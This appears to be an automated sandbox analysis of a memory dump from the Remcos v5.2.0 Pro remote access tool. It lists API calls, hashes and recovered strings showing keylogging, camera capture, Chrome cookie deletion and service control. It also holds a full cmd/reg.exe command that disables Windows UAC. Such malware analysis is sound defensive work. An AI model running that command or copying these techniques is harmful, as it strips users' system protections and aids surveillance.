                                                  • Instruction Fuzzy Hash: 430192723056156BF2246B54EC4AFAFB74DEB41A29F10092EF5018A340FBA5EC058AF1
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 02D7BB18
                                                  • GetLastError.KERNEL32 ref: 02D7BB22
                                                  Strings
                                                  • UserProfile, xrefs: 02D7BAE8
                                                  • [Chrome Cookies found, cleared!], xrefs: 02D7BB48
                                                  • [Chrome Cookies not found], xrefs: 02D7BB3C
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 02D7BAE3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: 45380029048f4a920d742c201022c3dd73254c5105cf937240ae6bc5389dc936
                                                  • Instruction ID: 1ed3e937ad240484f02fe3d7dcbbf092b13333e950b4d7c785d662d09051c584
                                                  • Opcode Fuzzy Hash: 45380029048f4a920d742c201022c3dd73254c5105cf937240ae6bc5389dc936
                                                  • Instruction Fuzzy Hash: C9018B31A840055B9704B7B5EC278BDB729E921714F505516D88753388FE19CD59CAF2
                                                  APIs
                                                  • AllocConsole.KERNEL32(02DE5348), ref: 02D8CE35
                                                  • ShowWindow.USER32(00000000,00000000), ref: 02D8CE4E
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 02D8CE73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AllocOutputShowWindow
                                                  • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                                  • API String ID: 2425139147-793934204
                                                  • Opcode ID: 79279d6fdd4ca3749df8124416cb1793b4ca63d09b1ac325eef13363ceb603fa
                                                  • Instruction ID: f4876bb31f636f423b268e467a864a75608d3fbf0b28cd1d5840f995259bbb95
                                                  • Opcode Fuzzy Hash: 79279d6fdd4ca3749df8124416cb1793b4ca63d09b1ac325eef13363ceb603fa
                                                  • Instruction Fuzzy Hash: 05018872D90304AAEA10F7F09C5AFCEB7ADDB15701F500912B609A73C0E765DD14CA71
                                                  APIs
                                                  • __allrem.LIBCMT ref: 02DAACE9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DAAD05
                                                  • __allrem.LIBCMT ref: 02DAAD1C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DAAD3A
                                                  • __allrem.LIBCMT ref: 02DAAD51
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DAAD6F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction ID: 1c9c946fbbfd85d80da437b60fe7a3ef72bf5b4b04d96290bedd4d491e740a8b
                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                  • Instruction Fuzzy Hash: EF81F976A017069BEB219E39CC60FAA73BADF44724F14462AE551D7780FB74DD00CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 29a6035a22418934c8647e0a92484b6d01e7b707ecaf7c43b84e079763ee3ddf
                                                  • Instruction ID: 3e89b844861d28d9bce4ac33162de33e2362104f059cae8af8a8dce10cc24d57
                                                  • Opcode Fuzzy Hash: 29a6035a22418934c8647e0a92484b6d01e7b707ecaf7c43b84e079763ee3ddf
                                                  • Instruction Fuzzy Hash: 2D51FB71904205EBDF269B68ACA0FEE77A9EF49334F944219E817A6381DB31DD04CA64
                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 02D7A77B
                                                    • Part of subcall function 02D7A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02D7A788), ref: 02D7A6E6
                                                    • Part of subcall function 02D7A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02D7A788), ref: 02D7A6F5
                                                    • Part of subcall function 02D7A6B0: Sleep.KERNEL32(00002710,?,?,?,02D7A788), ref: 02D7A722
                                                    • Part of subcall function 02D7A6B0: CloseHandle.KERNEL32(00000000,?,?,?,02D7A788), ref: 02D7A729
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02D7A7B7
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 02D7A7C8
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02D7A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02D7A859
                                                    • Part of subcall function 02D8C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,02DE5300,00000000,02D82232), ref: 02D8C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02DD6478,?,00000000,00000000,00000000,00000000,00000000), ref: 02D7A962
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID:
                                                  • API String ID: 3795512280-0
                                                  • Opcode ID: d5d638e331566de94f034d87ea17da80fa077bf9c9d1a8956db87d719c7bcad3
                                                  • Instruction ID: 041601c071b26b6e19083ee8ee13f25b2909c8ab0e175b489e249812443d66b2
                                                  • Opcode Fuzzy Hash: d5d638e331566de94f034d87ea17da80fa077bf9c9d1a8956db87d719c7bcad3
                                                  • Instruction Fuzzy Hash: 5F513D726042055ACB18BB70D864ABEB7ABDF81355F404A2DE586973D0FF2CDD09CAB1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm
                                                  • API String ID: 2936374016-3206640213
                                                  • Opcode ID: 61872951b5f7f1e122be7d182a9e986c1f43439471d3e2df6a2619cd7b636f45
                                                  • Instruction ID: c53308170627225fccce701ed55a4c6f3fec0ea44c9ce7f3ce71250374a1db97
                                                  • Opcode Fuzzy Hash: 61872951b5f7f1e122be7d182a9e986c1f43439471d3e2df6a2619cd7b636f45
                                                  • Instruction Fuzzy Hash: CBD1E136904206CBFB2A8F68C865BFAF7B1EF8A704F244159D547AB750D3359E40CBA0
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 02D80EA9
                                                  • int.LIBCPMT ref: 02D80EBC
                                                    • Part of subcall function 02D7E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 02D7E10D
                                                    • Part of subcall function 02D7E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 02D7E127
                                                  • std::_Facet_Register.LIBCPMT ref: 02D80EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 02D80F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02D80F23
                                                  • __Init_thread_footer.LIBCMT ref: 02D80F64
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID:
                                                  • API String ID: 3815856325-0
                                                  • Opcode ID: a79ac3812b396a94631826eaa51117f33279554d5bf65f0b1008460756d31c27
                                                  • Instruction ID: fe262973525b0ebb39081bbdbcf500d1cc1d31002b6c3b980dce9fcfbccd1c1e
                                                  • Opcode Fuzzy Hash: a79ac3812b396a94631826eaa51117f33279554d5bf65f0b1008460756d31c27
                                                  • Instruction Fuzzy Hash: 5221F032900114EBCB15FBA8E854C9E73AAEF44720F20455AE811AB3D0EBB1DE45CFE0
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,02DB1CC5,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB8299
                                                  • _free.LIBCMT ref: 02DB82CC
                                                  • _free.LIBCMT ref: 02DB82F4
                                                  • SetLastError.KERNEL32(00000000,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB8301
                                                  • SetLastError.KERNEL32(00000000,?,02D8BA44,-02DE6D3C,?,?,?,?,02DD6478,02D7D248,.vbs), ref: 02DB830D
                                                  • _abort.LIBCMT ref: 02DB8313
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 4796c94d9127c7bef849a95b108ed0c92c54f99d7e7d593c263cdfbdf28b2902
                                                  • Instruction ID: 01c65090d4fd7f4f8beb79649cd4cc26ac1d15b1a8ff016b3f13798524b8be71
                                                  • Opcode Fuzzy Hash: 4796c94d9127c7bef849a95b108ed0c92c54f99d7e7d593c263cdfbdf28b2902
                                                  • Instruction Fuzzy Hash: 8FF0627A940642EACA1372256C34BEA271EDFC1761F754518F85BD6380DF20CC02A964
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,02D8A6B4,00000000), ref: 02D8AB46
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02D8A6B4,00000000), ref: 02D8AB5A
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02D8A6B4,00000000), ref: 02D8AB67
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02D8A6B4,00000000), ref: 02D8AB76
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02D8A6B4,00000000), ref: 02D8AB88
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02D8A6B4,00000000), ref: 02D8AB8B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: aabbb5d7908efa43f83df9e2f6f5a602ca74812f3b0ced573eb8900ffa7b47bd
                                                  • Instruction ID: c75dcd1a82aa44c5ff6355608a19b30bcbc8b6bb9f0aa2d0e58ad4d538a297ad
                                                  • Opcode Fuzzy Hash: aabbb5d7908efa43f83df9e2f6f5a602ca74812f3b0ced573eb8900ffa7b47bd
                                                  • Instruction Fuzzy Hash: DAF0F63298021A7BD7107A249C58EFF3B6CEB453B1F600056FD0992340EB64DD15D9F0
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,02D8A731,00000000), ref: 02D8AAE4
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02D8A731,00000000), ref: 02D8AAF9
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,02D8A731,00000000), ref: 02D8AB06
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02D8A731,00000000), ref: 02D8AB11
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,02D8A731,00000000), ref: 02D8AB23
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,02D8A731,00000000), ref: 02D8AB26
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: 68075f585b1660a065bb33fe8ee1055b76c4d9374258d8592ee787432e74851a
                                                  • Instruction ID: d0749511576d786a5075d79fb25575443af8c051e59c768d0dffe4b6af43be49
                                                  • Opcode Fuzzy Hash: 68075f585b1660a065bb33fe8ee1055b76c4d9374258d8592ee787432e74851a
                                                  • Instruction Fuzzy Hash: F6F089715811276FD2116A209C98DFF276DEF85771B200856F845923409B64CD55F971
                                                  APIs
                                                    • Part of subcall function 02D83656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,02DE50F4), ref: 02D83678
                                                    • Part of subcall function 02D83656: RegQueryValueExW.ADVAPI32(?,02D7F34E,00000000,00000000,?,00000400), ref: 02D83697
                                                    • Part of subcall function 02D83656: RegCloseKey.ADVAPI32(?), ref: 02D836A0
                                                    • Part of subcall function 02D8C048: GetCurrentProcess.KERNEL32(?,?,?,02D82240), ref: 02D8C059
                                                  • _wcslen.LIBCMT ref: 02D8B7F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                  • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 37874593-4246244872
                                                  • Opcode ID: 600e88960eea0b75cc8c3289ac47f55efc7da9025a51bec63ab0e31fdc18bbc1
                                                  • Instruction ID: c4f823829ad6a831dc8b3fef4be92c2161ee39c7387d972d9b7845514f41eaca
                                                  • Opcode Fuzzy Hash: 600e88960eea0b75cc8c3289ac47f55efc7da9025a51bec63ab0e31fdc18bbc1
                                                  • Instruction Fuzzy Hash: DF215663A101046BEF18BAB49C95DAE776FDF48724F54157EE406A73C0FE289D098A70
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02D7B1AD
                                                  • wsprintfW.USER32 ref: 02D7B22E
                                                    • Part of subcall function 02D7A671: SetEvent.KERNEL32(?,?,00000000,02D7B245,00000000), ref: 02D7A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                  • API String ID: 1497725170-248792730
                                                  • Opcode ID: d8c5b0c8861f11d77ba9063cc163bca6e210695bc988f8556ecae5b9efc21ab4
                                                  • Instruction ID: 2d099f622ea139203b77aaf02087d2537ec861af6855000390d7beb75518704c
                                                  • Opcode Fuzzy Hash: d8c5b0c8861f11d77ba9063cc163bca6e210695bc988f8556ecae5b9efc21ab4
                                                  • Instruction Fuzzy Hash: D6115476404119AACB18FB94EC50CFEB7BDEE58311F50011EF44692290FF789E45DAB4
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 02D8D5EC
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02D8D607
                                                  • GetLastError.KERNEL32 ref: 02D8D611
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 423d2e10eb42b1af2eda5ea1e6f9230b74175941cb6b9bfedc029d336bc60642
                                                  • Instruction ID: 68afa2a6d8fd8f8510da6f44c810a9dfb99810d46b21e13837b759604bf7d569
                                                  • Opcode Fuzzy Hash: 423d2e10eb42b1af2eda5ea1e6f9230b74175941cb6b9bfedc029d336bc60642
                                                  • Instruction Fuzzy Hash: AB01E5B1D0421EABDB10EFE5DC85DEFBBBDEA04254F50092AF915A6280EB715D058AA0
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02D777D6
                                                  • CloseHandle.KERNEL32(?), ref: 02D777E5
                                                  • CloseHandle.KERNEL32(?), ref: 02D777EA
                                                  Strings
                                                  • C:\Windows\System32\cmd.exe, xrefs: 02D777D1
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 02D777CC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: 8026ca1e85de8c84aff1798dc69850833d1786497f0d78fdd27a258b53c06201
                                                  • Instruction ID: 78b286fd39db0ade579a670848c8e1d07b16f20927f0beefd2f305ec23e513b3
                                                  • Opcode Fuzzy Hash: 8026ca1e85de8c84aff1798dc69850833d1786497f0d78fdd27a258b53c06201
                                                  • Instruction Fuzzy Hash: D3F0BB72D8019D76DB20AAD6AC0DEDF7F3CEBC1B10F00051AF604A2244D6705814CAF0
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02DB338B,00000003,?,02DB332B,00000003,02DDE958,0000000C,02DB3482,00000003,00000002), ref: 02DB33FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02DB340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,02DB338B,00000003,?,02DB332B,00000003,02DDE958,0000000C,02DB3482,00000003,00000002,00000000), ref: 02DB3430
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 2e141c41182d4bc6ac959426bc8d8d50034b9c297a08ffc8ac78dc789435b431
                                                  • Instruction ID: 57fab53e4354589585178634c534a9f2db0257a02cab7b5381853869c08f5940
                                                  • Opcode Fuzzy Hash: 2e141c41182d4bc6ac959426bc8d8d50034b9c297a08ffc8ac78dc789435b431
                                                  • Instruction Fuzzy Hash: F1F04430E5020AFBDB129FA0EC59BEDBFB5EF04755F6044A8F806A2340DB754D50DA90
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,02DE4F08,02D74E7A,00000001,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000), ref: 02D75120
                                                  • SetEvent.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000), ref: 02D7512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000), ref: 02D75137
                                                  • CloseHandle.KERNEL32(?,?,00000000,02DE4F08,02D74CA8,00000000,?,?,00000000), ref: 02D75140
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: a48ae38511045393176ac679885e07df24bcbfddad6096889ef7abbb056aa40e
                                                  • Instruction ID: 9cbf33e87c7711a5c9e81abd016a13f84a779f105cb0568e6b04e1daa9dad0ef
                                                  • Opcode Fuzzy Hash: a48ae38511045393176ac679885e07df24bcbfddad6096889ef7abbb056aa40e
                                                  • Instruction Fuzzy Hash: C3F0F671840302AFE7103774AC0E5BABF99EB02311F900949FCC381758EA248C10CBA2
                                                  APIs
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 02D8AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 02D8AE91
                                                  • Sleep.KERNEL32(00002710), ref: 02D8AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 02D8AEA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 79b6c71579b7c6eeedb1d694140f59c31ea81034041d46042c1bacc4ce870ca3
                                                  • Instruction ID: 6671d68cbc4c0c3620ca39be34b7c2d2a2585a8e310c818db7d903c4284f7581
                                                  • Opcode Fuzzy Hash: 79b6c71579b7c6eeedb1d694140f59c31ea81034041d46042c1bacc4ce870ca3
                                                  • Instruction Fuzzy Hash: CAE0D826E40062376610337ABC0FCBF3F2DCAC2B60B51005AF90656344DC500C15CEF2
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 02D8B54A
                                                  • LoadResource.KERNEL32(00000000,?,?,02D7F419,00000000), ref: 02D8B55E
                                                  • LockResource.KERNEL32(00000000,?,?,02D7F419,00000000), ref: 02D8B565
                                                  • SizeofResource.KERNEL32(00000000,?,?,02D7F419,00000000), ref: 02D8B574
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: 6154d26f98eee8179aa1d9c159af4bf03fd72f9277d1d185da0784e57a46e624
                                                  • Instruction ID: 292543f7f7f12138795fb72170985a694e24b029a0d00ac35d4cd86458bd240f
                                                  • Opcode Fuzzy Hash: 6154d26f98eee8179aa1d9c159af4bf03fd72f9277d1d185da0784e57a46e624
                                                  • Instruction Fuzzy Hash: 84E01275A80213EBDB212B71A89DD96BF69E7C9B627210855FD0186354D6314C20DA10
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66aa5d02e35ea0a12887cf51c83dcc765979046b3e392bf48f74f0bc2d4a6826
                                                  • Instruction ID: f9622efbe9c17fb7911d6f4527a901989377c492b9980f582afa6db772d61bde
                                                  • Opcode Fuzzy Hash: 66aa5d02e35ea0a12887cf51c83dcc765979046b3e392bf48f74f0bc2d4a6826
                                                  • Instruction Fuzzy Hash: 02719371901296DBCB228B65C8B4BFFBBB5EF45754F284129E45AA7380D770CD41CBA0
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,02D7D29D), ref: 02D744C4
                                                    • Part of subcall function 02D74607: __EH_prolog.LIBCMT ref: 02D7460C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                  • API String ID: 3469354165-3547787478
                                                  • Opcode ID: f101c41f91b305c0261f03b7a667e6c0857e0cd2236175eea34196cf77c38981
                                                  • Instruction ID: f85f2f83d55de621ce6778a0ba8cc4019dfdd5486673ede5c8efe1db0e5531cc
                                                  • Opcode Fuzzy Hash: f101c41f91b305c0261f03b7a667e6c0857e0cd2236175eea34196cf77c38981
                                                  • Instruction Fuzzy Hash: 7751B431B082509BDA15FB349858A6E37ABDB85754F40052DE84A5B7D0FF6CCE09CBB2
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,02DCF244), ref: 02DB944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,02DE2764,000000FF,00000000,0000003F,00000000,?,?), ref: 02DB94C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,02DE27B8,000000FF,?,0000003F,00000000,?), ref: 02DB94F4
                                                  • _free.LIBCMT ref: 02DB943D
                                                    • Part of subcall function 02DB6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000), ref: 02DB6818
                                                    • Part of subcall function 02DB6802: GetLastError.KERNEL32(00000000,?,02DC0CEF,00000000,00000000,00000000,00000000,?,02DC0F93,00000000,00000007,00000000,?,02DC14DE,00000000,00000000), ref: 02DB682A
                                                  • _free.LIBCMT ref: 02DB9609
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: d170df7988f2347194076267de0e4f909b13005d6ffdc9d16566672462b32290
